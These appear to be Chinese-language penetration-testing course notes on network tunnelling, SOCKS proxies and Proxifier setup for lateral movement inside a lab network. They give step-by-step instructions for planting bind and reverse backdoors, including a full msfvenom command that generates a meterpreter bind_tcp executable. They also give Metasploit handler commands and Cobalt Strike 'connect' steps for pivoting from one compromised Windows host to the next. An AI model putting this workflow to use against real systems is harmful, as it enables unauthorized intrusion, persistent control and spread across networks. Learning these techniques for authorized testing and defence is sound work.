1.环境
隧道技术:
隧道技术是一类网络协议,它是一种数据包封装技术,它将原始IP包(其报头包含原始发送者和最终目的地)封装在另外一个数据包(称为封装的IP包)的数据净荷中进行传输,使用隧道的原因是在不兼容的网络上传输数据,或在不安全网络上提供一个安全路径,隧道协议通常(但并非总是)在一个比负载协议还高的层级或同一层。
简单来说就是通过网络隧道,可以使其隧道两端的网络进行互相通信,形成一个更到的网络,并且可以将不支持的协议数据包打包成支持的协议数据包后进行数据传输。
代理软件:
SocksCap Proxifier ProxyChains
代理协议:
SOCKS4/5
SOCKS代理与其他类型的代理不同,它只是简单地传递数据包,而并不关心是何种应用协议,既可以是HTTP请求,所以SOCKS代理服务器比其他类型的代理服务器速度要快得多。SOCKS代理又分为SOCKS4和SOCKS5,二者不同的是SOCKS4代理只支持TCP协议(即传输控制协议),而SOCKS5代理则既支持TCP协议又支持UDP协议(即用户数据包协议),还支持各种身份验证机制、服务器端域名解析等。SOCK4能做到的SOCKS5都可得到,但SOCKS5能够做到的SOCKS则不一定能做到。
实现两个目的:
(1)通讯后的渗透测试横向移动
(2)通讯后的控制上线CS&MSF
控制之前 肯定要得到权限 权限怎么知道 渗透测试流程网络通讯肯定是正常的才可以
忽视利用什么漏洞方式拿到的权限
**前提条件:**能进行通讯
两个部分:
(1)如何进行通讯
(2)如何拿到权限 没讲 横向移动课程
(3)如何进行控制
2.控制访问多台机器方法
使用木马上线控制win7
win10上线方法
正向
后门执行后数据交给本地2222端口 控制器连接当前的2222端口
反向
后门执行后数据交给远程2222端口 控制器监听的2222
win7上线》右击代理转发》socks代理》设置代理端口
Proxifier设置代理
设置
》配置文件
》代理服务器
》添加
》地址:攻击机的地址
》端口刚刚上面生成的端口
》查看会话窗口回显的socks版本,根据版本选择
》检查
设置
》配置文件
》代理规则
》添加
》名称随意
》应用程序默认
》目标主机选择Windows2008地址
》动作选择刚刚创建的
。
我们需要正向链接,生成本地后门,执行后的权限把数据交给本地2222端口。win7控制器链接当前win10的2222。win7和CS通信,至此可以访问win10
bind_tcp 没有host,因为直接给的本地
(反向后门:后门执行完交给控制器的2222,控制器再监听自己本地的2222)
cs上线win10
使用win10的CMD权限(信息搜集提权等操作取得的CMD权限)执行后门,并不会上线
需要在win7的会话中访问win10 connect 192.168.11.129 2222即可上线
用192.168.11.128(win7)去控制192.168.11.129(win10)
MSF上线win10
正向链接
msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=3333 -f exe > 2003.exe
监听
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.11.129 ##目标地址
set lport 3333
run
session会话
cs建立节点
然后探测资产信息,提权,正向链接
上线
建立监听,正向链接,生成后门,将后门放入win2012,执行后门
需要在win2008的会话中访问win2012 connect 192.168.33.130 4444即可上线
剩下同上
入栈严格怎么办?